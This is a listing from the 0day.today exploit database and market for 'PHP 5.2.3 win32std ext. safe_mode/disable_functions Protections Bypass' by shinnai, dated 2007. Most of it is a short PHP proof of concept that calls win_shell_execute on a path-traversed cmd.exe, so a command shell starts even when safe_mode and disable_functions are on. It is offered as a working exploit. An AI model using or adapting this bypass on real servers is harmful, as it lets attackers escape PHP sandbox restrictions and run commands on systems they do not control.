[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass

Author
shinnai
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7706
Category
local exploits
Date add
23-07-2007
Platform
unsorted
======================================================================
PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass
======================================================================



<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Thanks to rgod for all his precious advises :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be wxecuted
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>



#  0day.today [2024-11-15]  #